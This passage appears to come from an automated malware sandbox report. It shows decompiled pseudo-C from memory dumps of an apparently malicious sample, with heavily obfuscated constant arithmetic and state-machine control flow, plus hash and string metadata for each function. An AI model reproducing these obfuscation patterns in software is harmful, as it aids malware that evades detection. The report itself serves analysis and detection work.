                                              				_v84 = _v84 | 0x8208c103;
                                              				_v84 = _v84 ^ 0xb259d8d2;
                                              				_v48 = 0xe27e;
                                              				_v48 = _v48 | 0xfee9bf5f;
                                              				_v48 = _v48 ^ 0xfee98d98;
                                              				_v64 = 0x40d4;
                                              				_v64 = _v64 + 0xfffff13c;
                                              				_v64 = _v64 << 8;
                                              				_v64 = _v64 ^ 0x00321441;
                                              				_v68 = 0x6862;
                                              				_v68 = _v68 + 0x864e;
                                              				_v68 = _v68 << 3;
                                              				_v68 = _v68 ^ 0x0007582b;
                                              				_v92 = 0x5758;
                                              				_v92 = _v92 | 0xff7df76f;
                                              				_t251 = 0x39;
                                              				_v92 = _v92 / _t251;
                                              				_v92 = _v92 ^ 0x047b2a85;
                                              				_v96 = 0x40be;
                                              				_v96 = _v96 | 0xd59932a3;
                                              				_v96 = _v96 << 0xb;
                                              				_v96 = _v96 * 0x52;
                                              				_v96 = _v96 ^ 0x36096eff;
                                              				_v72 = 0x18a0;
                                              				_v72 = _v72 + 0x45e5;
                                              				_v72 = _v72 + 0xffff9352;
                                              				_v72 = _v72 ^ 0xffff81db;
                                              				_v100 = 0x6e96;
                                              				_v100 = _v100 * 0x3a;
                                              				_v100 = _v100 << 0x10;
                                              				_v100 = _v100 ^ 0x7246fe44;
                                              				_v100 = _v100 ^ 0x7fbac885;
                                              				_v104 = 0x65cf;
                                              				_v104 = _v104 / _t251;
                                              				_v104 = _v104 ^ 0xf75b4ca1;
                                              				_t252 = 0x48;
                                              				_v104 = _v104 / _t252;
                                              				_v104 = _v104 ^ 0x036f7b06;
                                              				_v76 = 0x2c53;
                                              				_t253 = 0x57;
                                              				_v76 = _v76 * 0x11;
                                              				_v76 = _v76 ^ 0x6f057687;
                                              				_v76 = _v76 ^ 0x6f07c581;
                                              				_v24 = 0x7097;
                                              				_v24 = _v24 >> 4;
                                              				_v24 = _v24 ^ 0x000060b2;
                                              				_v36 = 0x9151;
                                              				_v36 = _v36 << 0x10;
                                              				_v36 = _v36 ^ 0x43d947ca;
                                              				_v36 = _v36 ^ 0xd2881410;
                                              				_v40 = 0x482c;
                                              				_v40 = _v40 + 0xffffb888;
                                              				_v40 = _v40 << 1;
                                              				_v40 = _v40 ^ 0x00000914;
                                              				_v44 = 0x389f;
                                              				_v44 = _v44 * 0x76;
                                              				_v44 = _v44 * 0x18;
                                              				_v44 = _v44 ^ 0x02723fe4;
                                              				_v32 = 0x2aa8;
                                              				_v32 = _v32 * 0x38;
                                              				_v32 = _v32 ^ 0x551469c6;
                                              				_v32 = _v32 ^ 0x551d1a3f;
                                              				_v20 = 0xfc56;
                                              				_v20 = _v20 / _t253;
                                              				_v20 = _v20 ^ 0x000001b5;
                                              				goto L1;
                                              				do {
                                              					while(1) {
                                              						L1:
                                              						_t277 = _t272 - 0x17308d28;
                                              						if(_t277 > 0) {
                                              							break;
                                              						}
                                              						if(_t277 == 0) {
                                              							_push(_t253);
                                              							_t236 = E00237F1B();
                                              							_t274 =  &(_t274[1]);
                                              							_t272 = 0x2b65fd67;
                                              							_t271 = _t271 + _t236;
                                              							continue;
                                              						} else {
                                              							if(_t272 == 0x285a15) {
                                              								_t272 = 0x27256339;
                                              								continue;
                                              							} else {
                                              								if(_t272 == 0x30e9834) {
                                              									_t253 = _v72;
                                              									_t238 = E0022D64E(_t253, _v100, _v104, _t247 + 0x18, _v76);
                                              									_t274 =  &(_t274[3]);
                                              									_t272 = 0x1bffcccd;
                                              									_t271 = _t271 + _t238;
                                              									continue;
                                              								} else {
                                              									if(_t272 == 0x527ec93) {
                                              										_push(_t253);
                                              										_t241 = E00237F1B();
                                              										_t274 =  &(_t274[1]);
                                              										_t272 = 0x1cfcffb7;
                                              										_t271 = _t271 + _t241;
                                              										continue;
                                              									} else {
                                              										if(_t272 != 0x60183f8) {
                                              											goto L21;
                                              										} else {
                                              											_push(_v32);
                                              											_t271 = _t271 + E00237F1B();
                                              										}
                                              									}
                                              								}
                                              							}
                                              						}
                                              						L8:
                                              						return _t271;
                                              					}
                                              					if(_t272 == 0x1bffcccd) {
                                              						_t253 = _v24;
                                              						_t229 = E0022D64E(_t253, _v36, _v40, _t247 + 0x20, _v44);
                                              						_t274 =  &(_t274[3]);
                                              						_t272 = 0x60183f8;
                                              						_t271 = _t271 + _t229;
                                              						goto L21;
                                              					} else {
                                              						if(_t272 == 0x1cfcffb7) {
                                              							_push(_t253);
                                              							_t232 = E00237F1B();
                                              							_t274 =  &(_t274[1]);
                                              							_t272 = 0x17308d28;
                                              							_t271 = _t271 + _t232;
                                              							goto L1;
                                              						} else {
                                              							if(_t272 == 0x27256339) {
                                              								_t253 = _v52;
                                              								_t233 = E0022D64E(_t253, _v56, _v60, _t247, _v88);
                                              								_t274 =  &(_t274[3]);
                                              								_t272 = 0x527ec93;
                                              								_t271 = _t271 + _t233;
                                              								goto L1;
                                              							} else {
                                              								if(_t272 != 0x2b65fd67) {
                                              									goto L21;
                                              								} else {
                                              									_push(_t253);
                                              									_t246 = E00237F1B();
                                              									_t274 =  &(_t274[1]);
                                              									_t272 = 0x30e9834;
                                              									_t271 = _t271 + _t246;
                                              									goto L1;
                                              								}
                                              							}
                                              						}
                                              					}
                                              					goto L8;
                                              					L21:
                                              				} while (_t272 != 0x28759a70);
                                              				goto L8;
                                              			}















































                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: ,H$9c%'$9c%'$S,$XW$bh$~
                                              • API String ID: 0-4263808623
                                              • Opcode ID: 05e83836a57fa440519eb3f5be009a2ce7a5dbf4ce8713060be9fef2b7fd4d97
                                              • Instruction ID: 9430daf895a48d5db81e1183537003b9cc148bef3ade1f81d27c562b404759c0
                                              • Opcode Fuzzy Hash: 05e83836a57fa440519eb3f5be009a2ce7a5dbf4ce8713060be9fef2b7fd4d97
                                              • Instruction Fuzzy Hash: 31B153B29193818FD358CF25D98940BFBE1BBC4748F40891DF5869A260DBB5DA19CF43
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 96%
                                              			E002269A0(intOrPtr __ecx, intOrPtr* __edx) {
                                              				intOrPtr _v4;
                                              				intOrPtr _v8;
                                              				signed int _v12;
                                              				signed int _v16;
                                              				signed int _v20;
                                              				signed int _v24;
                                              				signed int _v28;
                                              				signed int _v32;
                                              				signed int _v36;
                                              				signed int _v40;
                                              				signed int _v44;
                                              				signed int _v48;
                                              				signed int _v52;
                                              				signed int _v56;
                                              				signed int _v60;
                                              				signed int _v64;
                                              				signed int _v68;
                                              				signed int _v72;
                                              				signed int _v76;
                                              				signed int _v80;
                                              				signed int _v84;
                                              				void* __edi;
                                              				void* __ebp;
                                              				void* _t182;
                                              				intOrPtr _t188;
                                              				intOrPtr _t190;
                                              				intOrPtr _t191;
                                              				intOrPtr _t192;
                                              				intOrPtr* _t193;
                                              				signed int _t195;
                                              				signed int _t196;
                                              				signed int _t197;
                                              				void* _t198;
                                              				void* _t199;
                                              				void* _t218;
                                              				intOrPtr _t222;
                                              				void* _t223;
                                              				intOrPtr _t227;
                                              				signed int* _t228;
                                              
                                              				_t228 =  &_v84;
                                              				_v8 = 0x71163c;
                                              				_t222 = 0;
                                              				_t193 = __edx;
                                              				_v4 = 0;
                                              				_v44 = 0xc562;
                                              				_t227 = __ecx;
                                              				_v44 = _v44 >> 2;
                                              				_t223 = 0xa9ba57f;
                                              				_v44 = _v44 ^ 0x8749252f;
                                              				_v44 = _v44 ^ 0x87491d9f;
                                              				_v16 = 0x2187;
                                              				_v16 = _v16 + 0x9003;
                                              				_v16 = _v16 ^ 0x00009583;
                                              				_v64 = 0x884c;
                                              				_v64 = _v64 ^ 0x157bb051;
                                              				_t195 = 0x5b;
                                              				_v64 = _v64 / _t195;
                                              				_v64 = _v64 + 0xffffc6fd;
                                              				_v64 = _v64 ^ 0x003c6beb;
                                              				_v76 = 0xc2af;
                                              				_t196 = 0x62;
                                              				_v76 = _v76 / _t196;
                                              				_v76 = _v76 << 0xb;
                                              				_v76 = _v76 + 0xffffe747;
                                              				_v76 = _v76 ^ 0x000fbc5b;
                                              				_v20 = 0xd86f;
                                              				_v20 = _v20 << 0xb;
                                              				_v20 = _v20 ^ 0x06c32379;
                                              				_v24 = 0x5847;
                                              				_v24 = _v24 ^ 0xbe016602;
                                              				_v24 = _v24 ^ 0xbe0159ab;
                                              				_v56 = 0x8b9e;
                                              				_v56 = _v56 << 8;
                                              				_v56 = _v56 ^ 0x62eb1469;
                                              				_v56 = _v56 ^ 0x62609790;
                                              				_v60 = 0xc8f5;
                                              				_v60 = _v60 | 0xe944ef36;
                                              				_v60 = _v60 ^ 0xbc6be2e2;
                                              				_v60 = _v60 ^ 0x552f2627;
                                              				_v84 = 0x43ed;
                                              				_v84 = _v84 ^ 0x08a0b069;
                                              				_v84 = _v84 | 0x0c951c83;
                                              				_v84 = _v84 + 0x562e;
                                              				_v84 = _v84 ^ 0x0cb6752c;
                                              				_v48 = 0x4b81;
                                              				_v48 = _v48 >> 0xc;
                                              				_v48 = _v48 + 0xffff2892;
                                              				_v48 = _v48 ^ 0xffff31fe;
                                              				_v80 = 0x3016;
                                              				_v80 = _v80 + 0x7dde;
                                              				_v80 = _v80 << 0xf;
                                              				_t197 = 0x36;
                                              				_v80 = _v80 / _t197;
                                              				_v80 = _v80 ^ 0x019c7f33;
                                              				_v52 = 0xfd2;
                                              				_v52 = _v52 + 0xffff2d18;
                                              				_v52 = _v52 + 0x6a3f;
                                              				_v52 = _v52 ^ 0xffffabb5;
                                              				_v28 = 0xa77b;
                                              				_v28 = _v28 ^ 0xae749dbd;
                                              				_v28 = _v28 ^ 0xae743f32;
                                              				_v32 = 0xf75f;
                                              				_v32 = _v32 | 0x58371397;
                                              				_v32 = _v32 ^ 0x5837ee79;
                                              				_v68 = 0x3d22;
                                              				_v68 = _v68 >> 0xd;
                                              				_v68 = _v68 << 0xf;
                                              				_v68 = _v68 >> 2;
                                              				_v68 = _v68 ^ 0x00007889;
                                              				_v72 = 0xcbcf;
                                              				_v72 = _v72 | 0x3a65856e;
                                              				_v72 = _v72 + 0xdb4;
                                              				_v72 = _v72 | 0x1789f940;
                                              				_v72 = _v72 ^ 0x3feda3a8;
                                              				_v36 = 0x2389;
                                              				_v36 = _v36 * 0x4b;
                                              				_v36 = _v36 | 0x61940fa3;
                                              				_v36 = _v36 ^ 0x619e1b1f;
                                              				_v40 = 0xa903;
                                              				_v40 = _v40 + 0x4cf2;
                                              				_v40 = _v40 | 0xc82713d6;
                                              				_v40 = _v40 ^ 0xc827b671;
                                              				_v12 = 0xc1c;
                                              				_v12 = _v12 ^ 0x8bcf36f0;
                                              				_v12 = _v12 ^ 0x8bcf5121;
                                              				while(1) {
                                              					L1:
                                              					_t198 = 0x374e1c43;
                                              					_t182 = 0x15aea868;
                                              					L2:
                                              					while(1) {
                                              						do {
                                              							if(_t223 == 0xa9ba57f) {
                                              								_push(_t198);
                                              								_push(_t198);
                                              								_t199 = 0x38;
                                              								_t222 = E00228736(_t199);
                                              								__eflags = _t222;
                                              								if(__eflags == 0) {
                                              									_t223 = 0x3a1f14a3;
                                              									_t182 = 0x15aea868;
                                              									_t198 = 0x374e1c43;
                                              									_t218 = 0x28fd42b4;
                                              									goto L19;
                                              								}
                                              								_t223 = 0x2094e6da;
                                              								L15:
                                              								_t182 = 0x15aea868;
                                              								L11:
                                              								_t198 = 0x374e1c43;
                                              								L12:
                                              								_t218 = 0x28fd42b4;
                                              								continue;
                                              							}
                                              							if(_t223 == 0xb1cacb5) {
                                              								return E0022F536(_v36, _v40, _v12, _t222);
                                              							}
                                              							if(_t223 == _t182) {
                                              								 *((intOrPtr*)(_t222 + 0x24)) = _t227;
                                              								_t188 =  *0x23ca24; // 0x0
                                              								 *((intOrPtr*)(_t222 + 0x2c)) = _t188;
                                              								 *0x23ca24 = _t222;
                                              								return _t188;
                                              							}
                                              							if(_t223 == 0x16c9d000) {
                                              								E0023422C(_v68,  *((intOrPtr*)(_t222 + 0x28)), _v72);
                                              								_t223 = 0xb1cacb5;
                                              								goto L15;
                                              							}
                                              							if(_t223 == 0x2094e6da) {
                                              								_push(_v24);
                                              								_t190 = E00236DB9( *((intOrPtr*)(_t193 + 4)), _t222, _t227, __eflags, _t198,  *_t193, _v76, _v20);
                                              								_t228 =  &(_t228[5]);
                                              								 *((intOrPtr*)(_t222 + 0x28)) = _t190;
                                              								__eflags = _t190;
                                              								_t198 = 0x374e1c43;
                                              								_t182 = 0x15aea868;
                                              								_t223 =  !=  ? 0x374e1c43 : 0xb1cacb5;
                                              								goto L12;
                                              							}
                                              							if(_t223 == _t218) {
                                              								_push(_t198);
                                              								_t191 = E00221132(_v48, _t198, _v80, _t198, _t222, _v52, _v28, _v32, E00239586);
                                              								_t228 =  &(_t228[9]);
                                              								 *((intOrPtr*)(_t222 + 0x1c)) = _t191;
                                              								__eflags = _t191;
                                              								_t182 = 0x15aea868;
                                              								_t223 =  !=  ? 0x15aea868 : 0x16c9d000;
                                              								goto L11;
                                              							}
                                              							if(_t223 != _t198) {
                                              								goto L19;
                                              							}
                                              							_t192 = E002276DB( *((intOrPtr*)(_t222 + 0x28)), _v56, _v60, _v84);
                                              							_t228 =  &(_t228[2]);
                                              							 *((intOrPtr*)(_t222 + 4)) = _t192;
                                              							_t218 = 0x28fd42b4;
                                              							_t223 =  !=  ? 0x28fd42b4 : 0x16c9d000;
                                              							goto L1;
                                              							L19:
                                              							__eflags = _t223 - 0x3a1f14a3;
                                              						} while (__eflags != 0);
                                              						return _t182;
                                              					}
                                              				}
                                              			}

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: "=$'&/U$.V$?j$GX$y7X$k<
                                              • API String ID: 0-2482092835
                                              • Opcode ID: 85757b9c49541ef2ecfca8c28d94e78a67c3242d0e1525d9dd188e9fb22e5055
                                              • Instruction ID: 5bf049d2146eab755ef7b9b1c36f1911f4c1bb31760e8b8c8907383defea08ab
                                              • Opcode Fuzzy Hash: 85757b9c49541ef2ecfca8c28d94e78a67c3242d0e1525d9dd188e9fb22e5055
                                              • Instruction Fuzzy Hash: 11A194B2528341AFD358CF65D58A40BFBE1FBD4314F408A1DF48AA6260C7B5C919CF82
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 92%
                                              			E00221280(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                              				char _v76;
                                              				signed int _v80;
                                              				signed int _v84;
                                              				signed int _v88;
                                              				signed int _v92;
                                              				signed int _v96;
                                              				signed int _v100;
                                              				signed int _v104;
                                              				signed int _v108;
                                              				signed int _v112;
                                              				signed int _v116;
                                              				signed int _v120;
                                              				signed int _v124;
                                              				signed int _v128;
                                              				void* _t124;
                                              				void* _t136;
                                              				void* _t143;
                                              				signed int _t144;
                                              				signed int _t145;
                                              				signed int _t146;
                                              				void* _t149;
                                              				void* _t170;
                                              				void* _t172;
                                              				void* _t173;
                                              
                                              				_push(_a16);
                                              				_t169 = _a8;
                                              				_push(_a12);
                                              				_push(_a8);
                                              				_push(_a4);
                                              				_push(__edx);
                                              				_push(__ecx);
                                              				E0022602B(_t124);
                                              				_v112 = 0x527a;
                                              				_t173 = _t172 + 0x18;
                                              				_v112 = _v112 + 0x9ab3;
                                              				_t170 = 0;
                                              				_t149 = 0x18640a1d;
                                              				_t144 = 0x56;
                                              				_v112 = _v112 * 0x2c;
                                              				_v112 = _v112 ^ 0x0028d5a0;
                                              				_v84 = 0xce56;
                                              				_v84 = _v84 | 0x89224a79;
                                              				_v84 = _v84 ^ 0x8922db02;
                                              				_v124 = 0x8cd1;
                                              				_v124 = _v124 ^ 0x879587c2;
                                              				_v124 = _v124 | 0xdff4f7f6;
                                              				_v124 = _v124 ^ 0xdff58592;
                                              				_v80 = 0x5082;
                                              				_v80 = _v80 * 5;
                                              				_v80 = _v80 ^ 0x0001dd7a;
                                              				_v100 = 0x94cc;
                                              				_v100 = _v100 >> 1;
                                              				_v100 = _v100 + 0xc5d3;
                                              				_v100 = _v100 ^ 0x0001674a;
                                              				_v104 = 0x7528;
                                              				_v104 = _v104 | 0x4afc80c9;
                                              				_v104 = _v104 * 0x41;
                                              				_v104 = _v104 ^ 0x0a3a6635;
                                              				_v108 = 0x5a30;
                                              				_v108 = _v108 >> 6;
                                              				_t145 = 0x51;
                                              				_v108 = _v108 / _t144;
                                              				_v108 = _v108 ^ 0x00000b43;
                                              				_v128 = 0x7a75;
                                              				_v128 = _v128 ^ 0x183e3e2b;
                                              				_v128 = _v128 >> 0xe;
                                              				_v128 = _v128 << 1;
                                              				_v128 = _v128 ^ 0x0000b567;
                                              				_v88 = 0xd0b6;
                                              				_v88 = _v88 << 2;
                                              				_v88 = _v88 ^ 0x0003606d;
                                              				_v92 = 0x29e5;
                                              				_v92 = _v92 << 0x10;
                                              				_v92 = _v92 ^ 0x29e559c0;
                                              				_v116 = 0xa20c;
                                              				_v116 = _v116 / _t145;
                                              				_v116 = _v116 << 1;
                                              				_v116 = _v116 ^ 0x00003b63;
                                              				_v120 = 0xbe93;
                                              				_v120 = _v120 | 0x1a4ed6db;
                                              				_v120 = _v120 + 0xa009;
                                              				_v120 = _v120 + 0xfffff07c;
                                              				_v120 = _v120 ^ 0x1a4feb5f;
                                              				_v96 = 0x4975;
                                              				_t146 = 0x2b;
                                              				_v96 = _v96 * 0x31;
                                              				_v96 = _v96 / _t146;
                                              				_v96 = _v96 ^ 0x000025f7;
                                              				do {
                                              					while(_t149 != 0x1a9c3b7) {
                                              						if(_t149 == 0xb87d72f) {
                                              							__eflags = E0022B055(_v120, _v96, __eflags,  &_v76, _t169 + 8);
                                              							_t170 =  !=  ? 1 : _t170;
                                              						} else {
                                              							if(_t149 == 0x18640a1d) {
                                              								_t149 = 0x1a19e858;
                                              								continue;
                                              							} else {
                                              								if(_t149 == 0x1a19e858) {
                                              									E002350F2( &_v76, _v112, _v84, _v124, _a12);
                                              									_t173 = _t173 + 0xc;
                                              									_t149 = 0x1a9c3b7;
                                              									continue;
                                              								} else {
                                              									if(_t149 != 0x2b3c78b1) {
                                              										goto L13;
                                              									} else {
                                              										_t143 = E00238F11( &_v76, _v128, _v88, _t169 + 4, _v92, _v116);
                                              										_t173 = _t173 + 0x10;
                                              										if(_t143 != 0) {
                                              											_t149 = 0xb87d72f;
                                              											continue;
                                              										}
                                              									}
                                              								}
                                              							}
                                              						}
                                              						L16:
                                              						return _t170;
                                              					}
                                              					_t136 = E00238F11( &_v76, _v80, _v100, _t169, _v104, _v108);
                                              					_t173 = _t173 + 0x10;
                                              					__eflags = _t136;
                                              					if(__eflags == 0) {
                                              						_t149 = 0x1a747795;
                                              						goto L13;
                                              					} else {
                                              						_t149 = 0x2b3c78b1;
                                              						continue;
                                              					}
                                              					goto L16;
                                              					L13:
                                              					__eflags = _t149 - 0x1a747795;
                                              				} while (__eflags != 0);
                                              				goto L16;
                                              			}
                                              0x00221432
                                              0x00221433
                                              0x00221447
                                              0x0022144b
                                              0x00221453
                                              0x00221453
                                              0x0022145d
                                              0x0022152a
                                              0x0022152c
                                              0x00221463
                                              0x00221469
                                              0x002214cd
                                              0x00000000
                                              0x0022146b
                                              0x0022146d
                                              0x002214be
                                              0x002214c3
                                              0x002214c6
                                              0x00000000
                                              0x0022146f
                                              0x00221475
                                              0x00000000
                                              0x0022147b
                                              0x00221493
                                              0x00221498
                                              0x0022149d
                                              0x002214a3
                                              0x00000000
                                              0x002214a3
                                              0x0022149d
                                              0x00221475
                                              0x0022146d
                                              0x00221469
                                              0x00221530
                                              0x0022153b
                                              0x0022153b
                                              0x002214e6
                                              0x002214eb
                                              0x002214ee
                                              0x002214f0
                                              0x002214fc
                                              0x00000000
                                              0x002214f2
                                              0x002214f2
                                              0x00000000
                                              0x002214f2
                                              0x00000000
                                              0x00221501
                                              0x00221501
                                              0x00221501
                                              0x00000000

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: 0Z$5f:$c;$uI$uz$zR
                                              • API String ID: 0-4070947617
                                              • Opcode ID: 763ded3f5558a66bbb923cfeb9a3956aa5b31dcbf45d9db1e7361bf3c87cd045
                                              • Instruction ID: df94728388e4c08ca3b0d5c4fc081ba750be5eae8751205a78b034a3cb702097
                                              • Opcode Fuzzy Hash: 763ded3f5558a66bbb923cfeb9a3956aa5b31dcbf45d9db1e7361bf3c87cd045
                                              • Instruction Fuzzy Hash: C8617571118341AFD758DE60D98591FBBE1FBC9708F80591DF19A862A0D7BACA28CF43
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 91%
                                              			E002217AC(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a20) {
                                              				char _v4;
                                              				signed int _v8;
                                              				signed int _v12;
                                              				signed int _v16;
                                              				signed int _v20;
                                              				signed int _v24;
                                              				signed int _v28;
                                              				signed int _v32;
                                              				signed int _v36;
                                              				signed int _v40;
                                              				signed int _v44;
                                              				signed int _v48;
                                              				signed int _v52;
                                              				void* __ecx;
                                              				void* _t124;
                                              				intOrPtr _t144;
                                              				void* _t148;
                                              				signed int _t167;
                                              				signed int _t168;
                                              				signed int _t169;
                                              				signed int _t170;
                                              				void* _t172;
                                              				signed int* _t175;
                                              
                                              				_push(_a20);
                                              				_push(1);
                                              				_push(1);
                                              				_push(_a8);
                                              				_push(_a4);
                                              				_push(__edx);
                                              				E0022602B(_t124);
                                              				_v48 = 0x839b;
                                              				_t175 =  &(( &_v52)[7]);
                                              				_t172 = 0;
                                              				_t148 = 0xc9f1fee;
                                              				_t167 = 0x65;
                                              				_v48 = _v48 / _t167;
                                              				_v48 = _v48 + 0xffff5433;
                                              				_t168 = 0x4c;
                                              				_v48 = _v48 / _t168;
                                              				_v48 = _v48 ^ 0x035e614e;
                                              				_v52 = 0x7a24;
                                              				_t169 = 0x57;
                                              				_v52 = _v52 * 0x3d;
                                              				_v52 = _v52 / _t169;
                                              				_v52 = _v52 | 0x143fc393;
                                              				_v52 = _v52 ^ 0x143ff5ea;
                                              				_v32 = 0x6195;
                                              				_v32 = _v32 ^ 0x160f1dee;
                                              				_v32 = _v32 << 1;
                                              				_v32 = _v32 ^ 0x2c1ed936;
                                              				_v44 = 0xc7f4;
                                              				_v44 = _v44 + 0xffff31e5;
                                              				_v44 = _v44 | 0xcdfc86d8;
                                              				_v44 = _v44 + 0xffff4cbe;
                                              				_v44 = _v44 ^ 0xffff1878;
                                              				_v12 = 0x3e0d;
                                              				_v12 = _v12 << 4;
                                              				_v12 = _v12 ^ 0x0003ab13;
                                              				_v24 = 0xe2a2;
                                              				_t170 = 0x4a;
                                              				_v24 = _v24 * 0x7d;
                                              				_v24 = _v24 >> 4;
                                              				_v24 = _v24 ^ 0x0006fa2b;
                                              				_v16 = 0xd6eb;
                                              				_v16 = _v16 >> 0xb;
                                              				_v16 = _v16 ^ 0x0000394e;
                                              				_v40 = 0x5ece;
                                              				_v40 = _v40 * 0x43;
                                              				_v40 = _v40 / _t170;
                                              				_v40 = _v40 >> 0xe;
                                              				_v40 = _v40 ^ 0x000003d1;
                                              				_v28 = 0xdfec;
                                              				_v28 = _v28 >> 6;
                                              				_v28 = _v28 << 0xb;
                                              				_v28 = _v28 ^ 0x001be0b4;
                                              				_v20 = 0x73b;
                                              				_v20 = _v20 ^ 0xd6615083;
                                              				_v20 = _v20 ^ 0xd6610707;
                                              				_v36 = 0x46b8;
                                              				_v36 = _v36 | 0xf1966772;
                                              				_v36 = _v36 ^ 0x374c3a36;
                                              				_v36 = _v36 * 0x27;
                                              				_v36 = _v36 ^ 0x4b440184;
                                              				_v8 = 0xd697;
                                              				_v8 = _v8 ^ 0x6f8084df;
                                              				_v8 = _v8 ^ 0x6f807f26;
                                              				_t171 = _v4;
                                              				while(_t148 != 0x24e4c4b) {
                                              					if(_t148 == 0xc9f1fee) {
                                              						_t148 = 0x3ad8e818;
                                              						continue;
                                              					} else {
                                              						if(_t148 == 0x1ffca7a2) {
                                              							E00231AB6(1, _v12, _t148, _a20, 1, _v24, _v16, _v4, _a4, _v40, _v28, _v20);
                                              							_t175 =  &(_t175[0xa]);
                                              							_t148 = 0x24e4c4b;
                                              							_t172 =  !=  ? 1 : _t172;
                                              							continue;
                                              						} else {
                                              							if(_t148 == 0x34494570) {
                                              								if(E00230729(_v32,  &_v4, _v44, _t171) != 0) {
                                              									_t148 = 0x1ffca7a2;
                                              									continue;
                                              								}
                                              							} else {
                                              								if(_t148 != 0x3ad8e818) {
                                              									L13:
                                              									if(_t148 != 0x2a0664e6) {
                                              										continue;
                                              									}
                                              								} else {
                                              									_t144 = E0022F6DF(_t148);
                                              									_t171 = _t144;
                                              									if(_t144 != 0xffffffff) {
                                              										_t148 = 0x34494570;
                                              										continue;
                                              									}
                                              								}
                                              							}
                                              						}
                                              					}
                                              					return _t172;
                                              				}
                                              				E00234F7D(_v36, _v8, _v4);
                                              				_t148 = 0x2a0664e6;
                                              				goto L13;
                                              			}


                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: >$$z$6:L7$N9$pEI4$pEI4
                                              • API String ID: 0-302225334
                                              • Opcode ID: d928014d7ecf15c2aff048d75bb162baffc58cf9acc09ad34620927ff094ad0e
                                              • Instruction ID: 59de74a452fecab7fbed2bb9528cb5de01348117578d84eb4bab802db580e151
                                              • Opcode Fuzzy Hash: d928014d7ecf15c2aff048d75bb162baffc58cf9acc09ad34620927ff094ad0e
                                              • Instruction Fuzzy Hash: 90615371118341AFD358CEA5D88581FBBE5BFC4358F444A1DF19696260C3B5CA6ACF83
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 96%
                                              			E002320C5() {
                                              				char _v524;
                                              				signed int _v528;
                                              				signed int _v532;
                                              				intOrPtr _v536;
                                              				signed int _v540;
                                              				signed int _v544;
                                              				signed int _v548;
                                              				signed int _v552;
                                              				signed int _v556;
                                              				signed int _v560;
                                              				signed int _v564;
                                              				signed int _v568;
                                              				signed int _v572;
                                              				signed int _v576;
                                              				signed int _v580;
                                              				signed int _v584;
                                              				signed int _v588;
                                              				signed int _v592;
                                              				void* _t124;
                                              				short* _t127;
                                              				void* _t132;
                                              				void* _t134;
                                              				intOrPtr _t150;
                                              				signed int _t159;
                                              				signed int _t160;
                                              				signed int _t161;
                                              				signed int _t167;
                                              				void* _t169;
                                              
                                              				_t169 = (_t167 & 0xfffffff8) - 0x250;
                                              				_v532 = _v532 & 0x00000000;
                                              				_v528 = _v528 & 0x00000000;
                                              				_t132 = 0x3ec8c14;
                                              				_v536 = 0x37230;
                                              				_v544 = 0xcdd0;
                                              				_v544 = _v544 >> 7;
                                              				_v544 = _v544 ^ 0x000074a7;
                                              				_v572 = 0xb951;
                                              				_v572 = _v572 + 0xffffa9df;
                                              				_v572 = _v572 ^ 0x00005eca;
                                              				_v584 = 0x3783;
                                              				_v584 = _v584 >> 1;
                                              				_t159 = 0x30;
                                              				_v584 = _v584 / _t159;
                                              				_v584 = _v584 ^ 0x00007df0;
                                              				_v592 = 0x764f;
                                              				_t160 = 0x29;
                                              				_v592 = _v592 * 0x6c;
                                              				_v592 = _v592 + 0xffff1483;
                                              				_v592 = _v592 ^ 0x0030effe;
                                              				_v580 = 0x26e4;
                                              				_v580 = _v580 + 0xffffa17d;
                                              				_v580 = _v580 >> 0xc;
                                              				_v580 = _v580 ^ 0x000fb6a3;
                                              				_v588 = 0x592d;
                                              				_v588 = _v588 * 0x5e;
                                              				_v588 = _v588 + 0xfffff058;
                                              				_v588 = _v588 ^ 0x0020c0b6;
                                              				_v576 = 0x67c6;
                                              				_v576 = _v576 >> 4;
                                              				_v576 = _v576 | 0x70f0481f;
                                              				_v576 = _v576 ^ 0x70f020ed;
                                              				_v568 = 0x5c9a;
                                              				_v568 = _v568 ^ 0x6d262440;
                                              				_v568 = _v568 ^ 0x6d2624e4;
                                              				_v552 = 0x512d;
                                              				_v552 = _v552 / _t160;
                                              				_v552 = _v552 ^ 0x00002fd7;
                                              				_v540 = 0x67a3;
                                              				_v540 = _v540 + 0x741c;
                                              				_v540 = _v540 ^ 0x0000c39d;
                                              				_v560 = 0xac4b;
                                              				_v560 = _v560 | 0x611015d1;
                                              				_v560 = _v560 ^ 0x6110f087;
                                              				_v548 = 0xff97;
                                              				_v548 = _v548 >> 8;
                                              				_v548 = _v548 ^ 0x000016db;
                                              				_v556 = 0xce04;
                                              				_t161 = 0x2b;
